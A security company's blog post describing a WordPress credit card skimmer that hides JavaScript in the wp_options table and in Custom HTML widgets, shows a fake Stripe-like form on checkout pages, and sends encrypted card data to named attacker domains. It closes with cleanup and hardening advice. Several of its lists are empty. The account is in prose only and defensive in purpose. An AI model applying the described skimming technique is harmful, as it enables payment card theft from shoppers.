Hoplon InfoSec
10 Jan, 2025
In recent cybersecurity developments, sophisticated credit card skimmer malware targeting WordPress checkout pages has been discovered. This malicious software operates covertly, injecting harmful JavaScript into database records to steal sensitive payment details. This blog will delve into how the malware operates, its implications, and the measures you can take to safeguard your WordPress website.
The attackers behind this malware utilize existing payment fields or inject fake credit card forms to capture users’ payment information discreetly. The malware effectively bypasses detection by popular file-scanning tools by embedding malicious code into the WordPress database, specifically within the wp_options table.
Instead of hiding in theme files or plugins, the malware resides in the database, enabling it to operate undetected on compromised WordPress websites. This innovative approach allows attackers to stay one step ahead of conventional security measures.
According to researchers at Sucuri, the malicious JavaScript is inserted into the WordPress database. One notable entry point for this code is the HTML block widget within the WordPress admin panel. By navigating to wp-admin > Appearance > Widgets, administrators may find the malicious script embedded in the Custom HTML widgets.
The malware’s primary focus is on checkout pages. It first verifies if the page URL contains “checkout” while excluding “cart.” This ensures that the script activates only when users are prepared to input their payment details, minimizing its visibility. Once active, the malware creates a fake payment form resembling legitimate payment processors like Stripe.
This counterfeit form includes fields for:
The malware captures real-time data entered into these fields, even if a legitimate payment form exists. This approach enables attackers to acquire sensitive payment information without raising suspicion.
The malware employs advanced encryption and encoding techniques to make detection and analysis more difficult. Specifically, it uses:
Once encrypted, the stolen data is transmitted to servers controlled by the attackers. These servers are associated with domains like valhafather[.]xyz and fqbe23[.]XYZ stores the compromised information for further exploitation.
The consequences of such attacks can be devastating, particularly for eCommerce websites relying on WordPress. Unauthorized access to customer payment details can lead to financial fraud, legal consequences, and a damaged business reputation.
If you suspect this malware has compromised your WordPress website, follow these steps to identify and remove the threat:
Remove any scripts that you do not recognize or that seem malicious.
Inspect your WordPress database for anomalies, especially within the wp_options table. Look for suspicious entries or code that could be the source of the infection.
Ensure your website’s software is up to date. This includes:
To protect your website from future attacks, implement robust security practices:
A WAF can block malicious traffic before it reaches your website. It also provides an additional layer of protection against vulnerabilities.
Adding a second layer of authentication ensures that even if an attacker gains access to login credentials, they cannot access your admin panel without the secondary verification code.
Use tools that monitor file changes on your website. These tools alert you to unauthorized modifications, enabling swift action.
Schedule regular backups of your website and database. In a security breach, you can restore your site to a previous, clean state.
In November 2024, researchers identified a similar credit card skimmer malware targeting Magento-powered eCommerce websites. This skimmer employed a combination of filesystem and database malware and advanced obfuscation techniques to evade detection.
These incidents underscore the importance of implementing comprehensive security measures, regardless of the platform your website is built on.
Credit card skimmer malware poses a significant threat to WordPress websites, particularly those involved in eCommerce. By understanding how this malware operates and adopting proactive security measures, you can protect your website and your customers from such attacks.
Regularly updating your website, employing a WAF, and conducting thorough security audits are essential to maintaining a secure online presence. You can mitigate risks and ensure a safe user environment by staying vigilant.
For more:
https://cybersecuritynews.com/wordpress-credit-card-skimmer/
Share this :